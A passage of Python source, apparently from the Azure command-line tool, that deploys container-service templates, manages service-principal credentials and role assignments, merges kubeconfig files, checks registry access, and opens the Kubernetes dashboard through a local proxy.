"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cmd.cli_ctx, assignee) if resolve_assignee else assignee
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for'
'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
return output
raise AzureInternalError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", None):
timeout = test_configs.get("timeoutInterval", 10)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
if err.output.find('unknown flag: --address'):
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
